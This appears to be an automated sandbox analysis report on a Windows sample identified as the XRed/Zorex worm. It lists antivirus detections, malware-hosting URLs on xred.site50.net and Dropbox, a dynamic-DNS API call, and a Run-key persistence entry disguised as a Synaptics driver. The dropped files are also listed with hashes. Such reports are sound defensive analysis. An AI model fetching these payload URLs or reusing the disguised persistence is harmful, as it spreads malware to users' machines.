C:\Users\user\Documents\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	WORM/Delphi.Gen
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCXD314.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCXD314.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\~$cache1	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\RCXD314.tmp	100%	Joe Sandbox ML
452cb0.rbf (copy)	0%	ReversingLabs
452cb5.rbf (copy)	0%	ReversingLabs
452cb6.rbf (copy)	0%	ReversingLabs
452cb7.rbf (copy)	0%	ReversingLabs
452cb8.rbf (copy)	0%	ReversingLabs
C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	0%	ReversingLabs
C:\ProgramData\Synaptics\RCXD314.tmp	92%	ReversingLabs	Win32.Worm.Zorex
C:\ProgramData\Synaptics\Synaptics.exe	87%	ReversingLabs	Win32.Worm.Zorex
C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\wixstdba.dll	0%	ReversingLabs
C:\Users\user\Desktop\._cache_file.exe	0%	ReversingLabs
C:\Users\user\Documents\~$cache1	92%	ReversingLabs	Win32.Worm.Zorex
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\concrt140.dll	0%	ReversingLabs
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140.dll	0%	ReversingLabs
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_1.dll	0%	ReversingLabs
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_2.dll	0%	ReversingLabs
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_codecvt_ids.dll	0%	ReversingLabs
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vccorlib140.dll	0%	ReversingLabs
C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vcruntime140.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140chs.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140cht.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140deu.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140enu.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140esn.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140fra.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140ita.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140jpn.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140kor.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140rus.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfc140u.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfcm140.dll	0%	ReversingLabs
C:\Windows\SysWOW64\mfcm140u.dll	0%	ReversingLabs
C:\Windows\SysWOW64\vcamp140.dll	0%	ReversingLabs
C:\Windows\SysWOW64\vcomp140.dll	0%	ReversingLabs
C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\wixstdba.dll	0%	ReversingLabs
C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	0%	ReversingLabs
C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://xred.site50.net/syn/SUpdate.ini0	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/Synaptics.rarZ	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/Synaptics.rard	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/SSLLibrary.dll6	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/SUpdate.iniZ	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	false	high
docs.google.com	142.250.186.78	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.usercontent.google.com	142.250.186.97	true	false	high
xred.mooo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
xred.mooo.com	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini0	file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	~$cache1.4.dr	false		high
http://wixtoolset.org/schemas/thmutil/2010	VC_redist.x86.exe, 00000014.00000002.4000297478.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, thm.xml.20.dr	false		high
https://docs.google.com/v	Synaptics.exe, 00000004.00000002.3994431866.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978f	Synaptics.exe, 00000004.00000002.3994431866.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlT	file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Synaptics.exe, 00000004.00000002.3994431866.0000000000727000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rar	~$cache1.4.dr	false		high
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor	file.exe, ._cache_file.exe.0.dr, VC_redist.x86.exe.8.dr, VC_redist.x86.exe.3.dr, ._cache_file.exe.2.dr	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978W	Synaptics.exe, 00000004.00000002.3994431866.00000000006C9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rard	file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.google.com/tificate	Synaptics.exe, 00000004.00000002.3994431866.00000000006AC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/	Synaptics.exe, 00000004.00000002.3994431866.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.3994431866.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dl	file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	~$cache1.4.dr	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	~$cache1.4.dr	false		high
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://xred.site50.net/syn/SUpdate.ini	~$cache1.4.dr	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000004.00000002.3999883167.0000000002190000.00000004.00001000.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978t	file.exe, 00000000.00000003.2171430757.0000000002F30000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll	~$cache1.4.dr	false		high
http://appsyndication.org/2006/appsyn	VC_redist.x86.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	docs.google.com	United States	15169	GOOGLEUS	false
142.250.186.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583478
Start date and time:	2025-01-02 20:40:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal74.spre.troj.expl.evad.winEXE@21/160@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 132 Number of non-executed functions: 256
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 184.28.90.27, 20.189.173.26, 13.107.246.45, 40.126.32.133, 4.245.163.56
Excluded domains from analysis (whitelisted): onedscolprdwus19.westus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
20:41:43	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
20:42:02	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {65e650ff-30be-469d-b63a-418d71ea1765} "C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" /burn.runonce

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
69.42.215.252	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	file.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
freedns.afraid.org	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AWKNET-LLCUS	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78
	file.exe	Get hash	malicious	XRed	Browse	142.250.186.97 142.250.186.78

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
452cb0.rbf (copy)	fillProxy_for_terminal_20210702_v1.0.0.exe	Get hash	malicious	Unknown	Browse
452cb0.rbf (copy)	fillProxy_for_terminal_20210702_v1.0.0.exe	Get hash	malicious	Unknown	Browse
452cb5.rbf (copy)	fillProxy_for_terminal_20210702_v1.0.0.exe	Get hash	malicious	Unknown	Browse
452cb5.rbf (copy)	fillProxy_for_terminal_20210702_v1.0.0.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

452cb0.rbf (copy)

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	141600
Entropy (8bit):	6.730918695182974
Encrypted:	false
SSDEEP:	3072:Dx2TmVYqVACERsarapgaqKSVoSkOuRoJm4t4/lAcXNt:FdbPFqjoPOuRou/lA2f
MD5:	072DA195F3C547B1584813E02E245CD8
SHA1:	EDA3A7CD19D4BB362BE37EC06290C1309962D4D4
SHA-256:	DBCB040304AC8A81E149840DEB816E1C4E5BC20487766541AA8C7C5C0629C804
SHA-512:	37BF63D59DF173D5152253CE2A4F5A2BB7DC2BF9F63BF7C379ED5BB3C9989BB782E6A836E8C6D7EBF2F927092E098FAA747F31AC4D6296194AEBCCC4EA8F68CE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fillProxy_for_terminal_20210702_v1.0.0.exe, Detection: malicious, Browse Filename: fillProxy_for_terminal_20210702_v1.0.0.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uI...'..'..'..r$..'..r"...'..r#..'.{"..'.{#..'.{$..'......'..&...'.{...'.{'..'.{...'.{%..'.Rich..'.................PE..L...\|V.^.........."!.........>............................................... ............@................................`...<....................... A......d....b..8............................b..@...............\............................text............................... ..`.data...D...........................@....idata..,...........................@..@.rsrc...............................@..@.reloc..d...........................@..B................................................................................................................................................................................................................................................................................................

452cb5.rbf (copy)

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4782880
Entropy (8bit):	7.048362842065633
Encrypted:	false
SSDEEP:	98304:rcQO/zACc35FeIj0v8Tu8expRWrBu2gubZkFLOAkGkzdnEVomFHKnP7z:jqie9v8CVp4Bu2gubZkFLOyomFHKnP
MD5:	4B9941864214A7BB96D3704420C2D28C
SHA1:	05ACF3D57A349DCF29BC68A7A6F0DEC6D971B940
SHA-256:	1F9CCCA43EEF25CA44C69648124265944493FC220BCDECDB79AA28C33468B59B
SHA-512:	5CB4FFE656AB0C9973A02A7055689F8B945BCFB312B6B324432A717B2C95FF89B35BF70AE553F5176921A7DFF0E8F8F357288496EDC149CB377675130C7AD38B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fillProxy_for_terminal_20210702_v1.0.0.exe, Detection: malicious, Browse Filename: fillProxy_for_terminal_20210702_v1.0.0.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........%.suv.suv.suv7.v.suv7.v.suv7.v.suv...v.suv..tw.suv..qw.suv..vw.suv..pw.suv7.v.suv.stv.wuv..\|w.ruv..uw.suv...v.suv..ww.suvRich.suv........................PE..L....V.^.........."!.........b......._*......................................0I.....r.I...@A.........................-....../......./...............H. A....E.x...l@..8...........................@4..@............./.....`.-......................text.............................. ..`.data...............................@....idata...T..../..V...6/.............@..@.didat......../......./.............@....rsrc........./......./.............@..@.reloc..x.....E......(E.............@..B................................................................................................................................................................................................................................

452cb6.rbf (copy)

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5082912
Entropy (8bit):	6.8680590475042465
Encrypted:	false
SSDEEP:	98304:pwTgRb/8LXPwCVSf9qGeFgHt23653x0qfSbNa/S306FLOAkGkzdnEVomFHKnPZC:6cR87wFFqG236L0XNa/S306FLOyomFHT
MD5:	109E1488C848F17E370F3973EFDE2C38
SHA1:	7F2FEB94CF7FD1378DF4963316C7941067E7EDC0
SHA-256:	0CE7B07B16BA59AAE714495043D1CC8385691125F977B34227DBE826DA6D1EEF
SHA-512:	6C66CA88306106E07432D05AE60A0278D6619E57B1B1EAC5C1AD4B02F3DD13EA8F68FE986322877FA975077C879629E0248239C00654420353772E8287583E23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........;%.sUv.sUv.sUv..v.sUv..v.sUv..v.sUv...v.sUv..Tw.sUv..Qw.sUv..Vw.sUv..Pw.sUv..v.sUv.sTvVpUv..\w9rUv..Uw.sUv...v.sUv..Ww.sUvRich.sUv........................PE..L....V.^.........."!......2..h.......V......../...............................M.....m.N...@A............................L.....3......`4..............NM. A....J.(.....2.8............................a..@.............3.....@.2......................text...t.2.......2................. ..`.data...8.....3.......2.............@....idata..DS....3..T....3.............@..@.didat.......P4.......4.............@....rsrc........`4...... 4.............@..@.reloc..(.....J.......I.............@..B................................................................................................................................................................................................................................

452cb7.rbf (copy)

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	82720
Entropy (8bit):	6.481840055375367
Encrypted:	false
SSDEEP:	768:7xg82UCqlWXqCVz79dzv3sG2wlv13BVO5ncylfhcsZGolyQw3n/20c6dhVbuwSy1:J2Slq7vzvvTyphcsZGBpcGhQwSwUJ0
MD5:	F46353456429BF7768968B6285D7C2FB
SHA1:	5A6A6D4DB4BBD32CD141C3CD3D4F1996F1D27084
SHA-256:	D7FA4DFD8681B10EBF04CB5C72D0F3A20EAF9C4D287CC05C973561EC8DC6A019
SHA-512:	92C1F4C4AE572DBA8409FBC51F1ACC7FE5C347AFBD0A8B4EABDD339C4F4EF91698B7487E0F4708B89FAE8D2D436644026B89EC53F16F128DA9D773BB5AFE23C2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.L............K.M......E......x.......x.......x.......o.....K.V.........X....x.......x.......xF......x......Rich............................PE..L....V.^.........."!.....@...........N.......P...............................0......@.....@.........................0................................... A... ..L...hU..8............................T..@............P..,............R..H............text...)?.......@.................. ..`.rdata..^....P.......D..............@..@.data...............................@....rsrc...............................@..@.reloc..L.... ......................@..B........................................................................................................................................................................................................................................................................................

452cb8.rbf (copy)

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	82720
Entropy (8bit):	6.4817802924170635
Encrypted:	false
SSDEEP:	1536:V8alW6KV4ueuAUnPcsZGVxIb+OvE1R4Wod:K6KpQUnPcsKIbHv+i
MD5:	A67DD2E47CAC448F5E0995FD8634FD4B
SHA1:	879F96580C33618EB4D4349DE3215A87BA132A56
SHA-256:	F371D0868A9BAD5B012AC25BDC55FBF41D7F9535ECDE1A37CB23F2732F5ED303
SHA-512:	912238A4299D50481EF3C48A0E7DBD799B29880131A9667AACD252E3BACE8CDD38F0EAA2EB2C6EE7380B8146B105F94E54F43134AFA841F70176C5F4F318D909
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.L............K.M......E......x.......x.......x.......o.....K.V.........X....x.......x.......xF......x......Rich............................PE..L....V.^.........."!.....@...........N.......P...............................0............@.........................0................................... A... ..L...hU..8............................T..@............P..,............R..H............text...)?.......@.................. ..`.rdata..^....P.......D..............@..@.data...............................@....rsrc...............................@..@.reloc..L.... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Config.Msi\452caf.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	18181
Entropy (8bit):	5.4731665751367675
Encrypted:	false
SSDEEP:	192:pQXhDBRheyswU8DI0wU8DUqJnQEs4qMfpE:pshDqwU8vwU850t
MD5:	FAD94E4FA5A880BECDC38C5F754A93BB
SHA1:	B02B83FEA1D690CBC734FDFA3590D1DE99F17BBA
SHA-256:	7DB45F720CC582DD2DD40465ACB89BD9AA091DF0A98150D3923FF3F602A9DE2B
SHA-512:	7816DB1790FAFADCC530504CABB7AF5CA0C5833EF8759F1FB882D1F26B50A7CC48A0DF5B394F6C82EB407E20969927076F9CB5A0E2BAD0BD14A24F5022E8E93E
Malicious:	false
Preview:	...@IXOS.@.....@Bu"Z.@.....@.....@.....@.....@.....@......&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2};.Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508..vc_runtimeMinimum_x86.msi.@.....@\o...@.....@........&.{DC639984-8B88-4DB7-A65E-0E5CCB21EAB1}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E3819B64-3C56-3DD7-921D-00B011AD31DE}&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}.@......&.{42F41217-AF8B-33D4-9CB3-FF5F696BECBB}&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}.@......&.{E8E39D3B-4F35-36D8-B892-4B28336FE041}&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}.@......&.{A2AA960C-FD3C-3A6D-BD6F-14933011AFB3}&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}.@......&.{A2E7203F-60C2-3D7E-8A46-DB3D381A2CE6}&.{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}.@......&.{BC0399EF-5E9D-3C7C-BFF5-5E9A95C96DAF}&

C:\Config.Msi\452cb4.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	20971
Entropy (8bit):	5.3376846385463725
Encrypted:	false
SSDEEP:	384:pAKLm0Ve2SD4QsrDSPDsBpEsBiF2iqQDSR2IB:pZLm0Ve2SD4QsrDSPDsHEsUF2i5D62IB
MD5:	AB6413106CC4B032BD3811E14779CC27
SHA1:	D5B70B7F0FDDD08E9030E2C79E38BFAFD93BFA88
SHA-256:	2A815E0FEC21B639E89B62EA8A5DC18C4E190992652E4647DA297538B2A7AD78
SHA-512:	E4DA98545FF242312BC9F4ED03E26DB1F1EDACBA8C12790B9A21FCE8861E8EB42F5666F76D7CCBA10CC80DCB8437C7116BD4525D55014558E211D9417AE98ED2
Malicious:	false
Preview:	...@IXOS.@.....@Bu"Z.@.....@.....@.....@.....@.....@......&.{0FA68574-690B-4B00-89AA-B28946231449}>.Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508..vc_runtimeAdditional_x86.msi.@.....@\o...@.....@........&.{AD7DFCA8-EC53-476F-8C40-02D89ABDEA49}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E3819B64-3C56-3DD7-921D-00B011AD31DE}&.{0FA68574-690B-4B00-89AA-B28946231449}.@......&.{4FD4AB8C-C57F-3782-9230-9CCA22153AD3}&.{0FA68574-690B-4B00-89AA-B28946231449}.@......&.{46A1EA6B-3D81-3399-8991-127F7F7AE76A}&.{0FA68574-690B-4B00-89AA-B28946231449}.@......&.{C94DDE19-CC70-3B9A-A6AF-5CA7340B9B9A}&.{0FA68574-690B-4B00-89AA-B28946231449}.@......&.{946D6FA6-49BB-3415-AD2D-4D634C432CF0}&.{0FA68574-690B-4B00-89AA-B28946231449}.@......&.{E533B148-A83A-3788-A763-0C6C4

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
